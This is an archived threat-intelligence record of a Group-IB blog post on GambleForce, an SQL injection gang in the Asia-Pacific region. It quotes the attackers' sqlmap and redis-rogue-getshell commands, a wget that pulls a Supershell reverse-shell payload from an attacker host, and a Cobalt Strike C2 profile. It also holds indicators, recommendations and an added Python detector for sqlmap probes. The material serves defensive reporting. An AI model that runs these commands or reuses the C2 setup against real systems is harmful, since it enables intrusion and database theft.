{
	"id": "928b0106-1130-4776-9d8e-24fc1fc662bd",
	"created_at": "2026-04-06T00:22:33.676131Z",
	"updated_at": "2026-04-10T03:32:21.643049Z",
	"deleted_at": null,
	"sha1_hash": "000b7af5d96a2a706eee2e3a95ff571dbbb34d03",
	"title": "Exposing GambleForce, an SQL injection gang | Group-IB Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 115706,
	"plain_text": "Nikita Rostovcev\r\nAPAC Technical Head - ASM, TI \u0026 DRP\r\nAce in the Hole: exposing GambleForce, an SQL injection gang\r\nAnalysis of TTPs tied to GambleForce, which carried out SQL injection attacks against companies in the APAC region\r\nDecember 14, 2023 · Threat Intelligence\r\nhttps://www.group-ib.com/blog/gambleforce-gang/\r\nPage 1 of 13\r\nIntroduction\r\nIn mid-September 2023, during routine monitoring of adversary infrastructure, Group-IB’s Threat Intelligence unit identified a command and control (C\u0026C) server that was hosting several tools. Notably, none were custom-made: the entire toolset consisted of publicly available open-source instruments built for penetration testing. After examining the toolset in more detail, it became clear that the tools were most likely associated with a threat actor executing one of the oldest attack methods: SQL injection.\r\nWhile delving deeper into the malicious infrastructure, Group-IB researchers identified the threat actor’s first targets, predominantly linked to the gambling industry. This prompted the Threat Intelligence unit to name the threat actor GambleForce (tracked as EagleStrike GambleForce in Group-IB’s Threat Intelligence Platform). 
Since it appeared in September 2023, GambleForce has targeted more than 20 websites (government, gambling, retail, travel, and job-seeking) in Australia, China, Indonesia, the Philippines, India, South Korea, Thailand, and Brazil. Despite using very basic attack methods, the threat actor has managed to successfully attack six companies in Australia (travel), Indonesia (travel, retail), the Philippines (government), and South Korea (gambling), which shows just how vulnerable many organizations remain to rudimentary but clearly dangerous SQL injection attacks.\r\nIn some instances, the attackers stopped after performing reconnaissance. In other cases, they successfully extracted user databases containing logins and hashed passwords, along with lists of tables from accessible databases. Rather than looking for specific data, the threat actor attempts to exfiltrate any available piece of information within targeted databases, such as hashed and plaintext user credentials. What the group does with the stolen data remains unknown so far.\r\nAfter identifying GambleForce’s C\u0026C, Group-IB’s Threat Intelligence researchers shared this information with the company’s 24/7 Computer Emergency Response Team (CERT-GIB), which then took down the cybercriminals’ command and control server. Nonetheless, we believe that GambleForce is most likely to regroup, rebuild its infrastructure before long, and launch new attacks.\r\nWe have therefore written this blog post to describe the group’s tools and point out the relevant indicators of compromise (IoCs). 
The post also contains recommendations for corporate cybersecurity teams on how to better defend against SQL injection attacks.\r\nKey findings\r\n- GambleForce is a previously unknown threat actor involved in SQL injection attacks\r\n- Since it appeared in September 2023, the group has targeted 24 websites (government, gambling, retail, travel, and job-seeking)\r\n- The group primarily focuses on the Asia-Pacific region: Australia, China, Indonesia, the Philippines, India, South Korea, Thailand\r\n- GambleForce uses a set of publicly available open-source pentesting tools: dirsearch, redis-rogue-getshell, Tinyproxy, sqlmap, and Cobalt Strike\r\n- The version of Cobalt Strike discovered on the gang’s server used commands in Chinese\r\n- In one attack in Brazil, the attackers exploited CVE-2023-23752, an improper access check in Joomla CMS that lets unauthenticated requests read the site configuration, including database credentials, but they failed to exfiltrate any data\r\n- Group-IB took down the gang’s C\u0026C and sent notifications to the identified victims\r\n- Group-IB’s Threat Intelligence unit believes that the group may soon rebuild its infrastructure, and we continue to monitor its activity\r\nGambleForce’s toolset\r\nThe attackers used tools such as dirsearch, sqlmap, Tinyproxy, and redis-rogue-getshell without any unique modifications, keeping almost all default settings:\r\npython dirsearch.py -u [targetdomain]\r\npython redis-master.py -r [targetip] -p 6379 -L 212.60.5[.]129 -P 21000 -f RedisModulesSDK/e\r\nsqlmap -r /root/tools/1111.txt --technique=U -D [victimdatabasename] -T [victimtablename]\r\nsqlmap -r [victimdomainname].txt --dbms=mysql -D [victimdatabasename] -T tbl_content --dum\r\nIn the redis-rogue-getshell command, -L and -P point the exposed Redis instance at the attackers’ own rogue master on the C\u0026C server (212.60.5[.]129:21000), which pushes a malicious module to the target through Redis replication and loads it for code execution. In the sqlmap commands, -r replays an HTTP request saved from the target and --technique=U restricts testing to UNION-query injection, the technique that returns query results directly in the HTTP response.\r\nsqlmap can be especially dangerous. Beyond data extraction, its file-write and OS-shell features can load additional malware onto targeted servers, which allows for lateral movement. A notable example of this tactic was observed by Group-IB’s Threat Intelligence unit in an incident involving APT41: the attackers gained initial access using sqlmap, then uploaded Cobalt Strike to the compromised servers.\r\nInteresting features that we discovered on the attackers’ server include:\r\nUsing the following command on the attackers’ C\u0026C server:\r\nThe attackers used this command 95 times out of nearly 750 commands executed on the server. Such frequent use could indicate that the devices used by the attackers have a locale other than en_US and that the command was necessary to ensure that the entered commands were accepted without errors.\r\nLoading a file from a remote source that hosted Supershell, a Chinese-language framework with a web interface for creating and managing reverse shells. We identified how the attackers used the command:\r\nwget http://38.54.40[.]156:8888/supershell/compile/download/linuxamdx64 -O /var/tmp/.cache\r\nThe payload is written to a dot-prefixed file in the world-writable /var/tmp directory, a common way to keep it out of a casual directory listing. A tmux session was launched immediately after that, however, and we have no information about what the attackers did with the file next.\r\nCobalt Strike\r\nGambleForce does not use default settings for Cobalt Strike. 
The attackers launch their malleable profile, which contains the following C\u0026C domains:\r\nDns-supports[.]online\r\nWindows.updates[.]wiki\r\nThe team server was started with the profile as follows; note that the team server password is visible on the command line and is reused as the keystore password inside the profile:\r\n./teamserver 212.60.5[.]129 qwertyuiop123 cs2.profile\r\nhttps-certificate {\r\n    set keystore \"cs.store\";\r\n    set password \"qwertyuiop123\";\r\n}\r\nhttp-stager {\r\n    set uri_x86 \"/api/1\";\r\n    set uri_x64 \"/api/2\";\r\n    client {\r\n        header \"Host\" \"www.dns-supports[.]online\";\r\n    }\r\n    server {\r\n        output {\r\n            print;\r\n        }\r\n    }\r\n}\r\nhttp-get {\r\n    set uri \"/api/3\";\r\n    client {\r\n        header \"Host\" \"www.dns-supports[.]online\";\r\n        metadata {\r\n            base64;\r\n            header \"Cookie\";\r\n        }\r\n    }\r\n    server {\r\n        output {\r\n            print;\r\n        }\r\n    }\r\n}\r\nhttp-post {\r\n    set uri \"/api/4\";\r\n    client {\r\n        header \"Host\" \"www.dns-supports[.]online\";\r\n        id {\r\n            uri-append;\r\n        }\r\n        output {\r\n            print;\r\n        }\r\n    }\r\n    server {\r\n        output {\r\n            print;\r\n        }\r\n    }\r\n}\r\nThe profile pins the stager and beacon URIs to /api/1 through /api/4, sets the Host header to dns-supports[.]online, carries beacon metadata base64-encoded in the Cookie header, and appends the session id to the POST URI; these are the fields to pivot on when searching proxy logs for this infrastructure.\r\nInterestingly, the version of Cobalt Strike discovered on the gang’s server used commands in Chinese, but this fact alone is not enough to attribute the group’s origin.\r\nSource: Group-IB Graph Network Analysis Tool\r\nThe attackers also use Cobalt Strike with self-signed SSL certificates for the team server and listeners, which mimic “Microsec e-Szigno Root CA” and “Cloudflare”:\r\nkeytool -keystore CobaltStrikepro.store -storepass 123456 -keypass 123456 -genkey -keyalg\r\nA spoofed issuer name does not make the certificate trusted: the chain still fails validation against public roots, which is a detection opportunity in its own right.\r\nThe attackers used the username nmgb (two other names, neo2323 and sbsbsb22, appear once each from a single address) and the following IP addresses to log into the operator panel:\r\nnmgb (37.128.246[.]50) joined\r\nnmgb (37.128.246[.]50) joined\r\nneo2323 (38.60.220[.]230) joined\r\nnmgb (37.128.246[.]50) joined\r\nsbsbsb22 (38.60.220[.]230) joined\r\nnmgb (130.162.156[.]51) joined\r\nnmgb (172.104.113[.]179) joined\r\nnmgb (172.104.113[.]179) joined\r\nnmgb (123.118.226[.]80) joined\r\nnmgb (123.118.226[.]80) joined\r\nnmgb (123.118.226[.]80) joined\r\nnmgb (172.104.51[.]37) joined\r\nnmgb (37.128.246[.]50) joined\r\nnmgb (37.128.246[.]50) joined\r\nnmgb (37.128.246[.]50) joined\r\nnmgb (37.128.246[.]50) joined\r\nnmgb (37.128.246[.]50) joined\r\nnmgb (37.128.246[.]50) joined\r\nMITRE ATT\u0026CK® as shown by the Group-IB Threat Intelligence platform\r\nConclusion\r\nSQL injection attacks persist because they are simple by nature. Companies often overlook how critical input handling and data validation are, which leads to vulnerable coding practices, outdated software, and improper database settings. This negligence creates the perfect landscape for SQL injection attacks on public-facing web applications. As a result, companies remain susceptible to such attacks because they fail to address fundamental flaws.\r\nAt the same time, web injections remain a major problem because they are difficult to detect. Businesses should monitor their systems for any suspicious activity, as web injections can go undetected for a long time.\r\nPreventing web injection attacks requires a set of reliable measures: identifying injection flaws (weak spots in the company’s assets), manual code review, secure coding practices such as parameterized queries, penetration testing, input validation, and patch management.\r\nRecommendations\r\nGroup-IB penetration testing services combine the manual work of experts with over 40 automated tools, using the latest methods and techniques collected by Group-IB Threat Intelligence. With over a thousand successfully completed security assessment projects, we have the expertise and experience to identify assets that are vulnerable to SQL injection attacks.\r\nSQL injection attacks today are also facilitated by malicious bots. 
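Whether driven by a bot or typed by an operator, the toolset described above leaves distinctive traces in a web server’s access log: sqlmap’s UNION and boolean probes in the query string, its stock User-Agent when nobody bothered to change it, and the burst of 404s a dirsearch run produces. As an added example that is not part of Group-IB’s post, the Python below runs those three checks over a handful of constructed combined-format log lines (addresses from the RFC 5737 documentation ranges). The regular expressions and the 404 threshold are illustrative starting points, not tuned detection content.

```python
'''Added example, not from the Group-IB post: spotting sqlmap- and dirsearch-style
probing in a web server access log (combined log format). Every log line below is
constructed; the addresses come from the RFC 5737 documentation ranges.'''
import re
import shlex
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample: 203.0.113.10 runs sqlmap (one request still carries its stock
# User-Agent), 203.0.113.11 brute-forces paths the way dirsearch does, and
# 198.51.100.7 is an ordinary visitor.
SAMPLE_LOG = '''
203.0.113.10 - - [14/Dec/2023:10:01:02 +0000] \"GET /index.php?id=1 HTTP/1.1\" 200 5120 \"-\" \"Mozilla/5.0\"
203.0.113.10 - - [14/Dec/2023:10:01:03 +0000] \"GET /index.php?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL-- HTTP/1.1\" 500 0 \"-\" \"sqlmap/1.7.11#stable (https://sqlmap.org)\"
203.0.113.10 - - [14/Dec/2023:10:01:04 +0000] \"GET /index.php?id=1%20AND%201%3D1 HTTP/1.1\" 200 5120 \"-\" \"Mozilla/5.0\"
203.0.113.11 - - [14/Dec/2023:10:02:00 +0000] \"GET /admin/ HTTP/1.1\" 404 0 \"-\" \"Mozilla/5.0\"
203.0.113.11 - - [14/Dec/2023:10:02:00 +0000] \"GET /backup.zip HTTP/1.1\" 404 0 \"-\" \"Mozilla/5.0\"
203.0.113.11 - - [14/Dec/2023:10:02:01 +0000] \"GET /.git/HEAD HTTP/1.1\" 404 0 \"-\" \"Mozilla/5.0\"
198.51.100.7 - - [14/Dec/2023:10:03:00 +0000] \"GET /about HTTP/1.1\" 200 2048 \"-\" \"Mozilla/5.0\"
'''

# Shapes sqlmap emits for its UNION (--technique=U) and boolean-blind checks. The group
# (?:^|[^a-z]) stands in for a word boundary so that a path like /reunion does not match.
SQLI_PATTERNS = [
    re.compile(r'(?:^|[^a-z])union(?:[^a-z].{0,40})?select(?:[^a-z]|$)', re.I),
    re.compile(r'(?:^|[^a-z])(?:and|or) +[0-9]+ *= *[0-9]+', re.I),
]


def parse_line(line: str):
    '''Split one combined-format line into (ip, path, status, user_agent), or None.
    shlex handles the quoted request and User-Agent fields without a regex.'''
    try:
        fields = shlex.split(line)
    except ValueError:
        return None  # unbalanced quotes: malformed line
    if len(fields) < 10:
        return None
    request = fields[5].split(' ')  # method, path, protocol
    if len(request) < 2:
        return None
    return fields[0], request[1], fields[6], fields[9]


def is_sqli_probe(path: str) -> bool:
    '''Decode twice so double-encoded payloads are caught as well, then pattern-match.'''
    decoded = unquote_plus(unquote_plus(path))
    return any(p.search(decoded) for p in SQLI_PATTERNS)


def analyze(log_text: str) -> dict:
    '''Per-source summary: SQLi-shaped requests, tool User-Agent seen, and 404 count.'''
    report = defaultdict(lambda: {'sqli_requests': 0, 'tool_ua': False, 'not_found': 0})
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue  # a production pipeline would count these rather than drop them
        ip, path, status, ua = parsed
        entry = report[ip]
        if is_sqli_probe(path):
            entry['sqli_requests'] += 1
        # sqlmap’s stock User-Agent. It is one --random-agent flag away from vanishing,
        # so its absence proves nothing; its presence is a free confirmation.
        if ua.lower().startswith('sqlmap/'):
            entry['tool_ua'] = True
        if status == '404':
            entry['not_found'] += 1
    return dict(report)


def suspicious_sources(report: dict, not_found_threshold: int = 3) -> list:
    '''Sources an analyst should look at. The 404 threshold is illustrative: a dirsearch
    run with its default wordlist sends thousands of requests, most of them answered 404.'''
    return sorted(ip for ip, e in report.items()
                  if e['sqli_requests'] or e['tool_ua'] or e['not_found'] >= not_found_threshold)


if __name__ == '__main__':
    summary = analyze(SAMPLE_LOG)
    for ip in suspicious_sources(summary):
        print(ip, summary[ip])
```

Running it flags the sqlmap source on two counts (payload shape and User-Agent) and the dirsearch source on 404 volume alone, while the ordinary visitor stays quiet. The payload patterns catch only the noisiest techniques; time-based and heavily tampered injections need response-timing and error-rate baselines that a single log line cannot provide.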
These automated processes enable threat actors to systematically identify and exploit vulnerabilities in a targeted system or database. The consequences of such attacks extend to unauthorized access to databases, potentially leading to data theft and compromise.\r\nGroup-IB’s Fraud Protection solution adopts a proactive approach to this attack technique: its AI builds behavior profiles of users and devices and, within a few milliseconds, distinguishes genuine user interactions from activity generated by a third party such as a fraudster or a sophisticated bot.\r\nBy implementing these measures, Group-IB Fraud Protection aims to mitigate not only SQL injection attempts but also the broader risks generated by automated bot-driven attacks.\r\nFor comprehensive cyber protection, Group-IB Managed XDR is designed to detect and prevent various types of cyber threats, including ones that go unnoticed by other solutions. Our NTA technology, equipped with advanced network traffic analysis capabilities, uses its signatures, Group-IB Threat Intelligence data, and machine learning to provide threat detection and prevention.\r\nMXDR uses behavioral analysis to identify suspicious activity within established network protocols, which can help organizations detect potential SQL injection attacks and other security threats.\r\nIn the event of deviations from normal network activity, MXDR alerts the security team and automates incident response to mitigate the threat in real time. Response actions range from isolating hosts and killing processes to obtaining console access for investigation.\r\nNetwork indicators\r\nDns-supports[.]online\r\nWindows.updates[.]wiki\r\n212.60.5[.]129\r\n38.54.40[.]156",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA"
	],
	"references": [
		"https://www.group-ib.com/blog/gambleforce-gang/"
	],
	"report_names": [
		"gambleforce-gang"
	],
	"threat_actors": [
		{
			"id": "8d1c3575-c954-4e39-8717-8d15ccd4020e",
			"created_at": "2024-01-18T02:02:34.725883Z",
			"updated_at": "2026-04-10T02:00:05.007755Z",
			"deleted_at": null,
			"main_name": "GambleForce",
			"aliases": [],
			"source_name": "ETDA:GambleForce",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Dirsearch",
				"Tinyproxy",
				"cobeacon",
				"redis-rogue-getshell",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e55fb744-4fb6-4b73-a326-d4d014d6a3d7",
			"created_at": "2023-12-21T02:00:06.102133Z",
			"updated_at": "2026-04-10T02:00:03.503718Z",
			"deleted_at": null,
			"main_name": "GambleForce",
			"aliases": [],
			"source_name": "MISPGALAXY:GambleForce",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434953,
	"ts_updated_at": 1775791941,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/000b7af5d96a2a706eee2e3a95ff571dbbb34d03.pdf",
		"text": "https://archive.orkl.eu/000b7af5d96a2a706eee2e3a95ff571dbbb34d03.txt",
		"img": "https://archive.orkl.eu/000b7af5d96a2a706eee2e3a95ff571dbbb34d03.jpg"
	}
}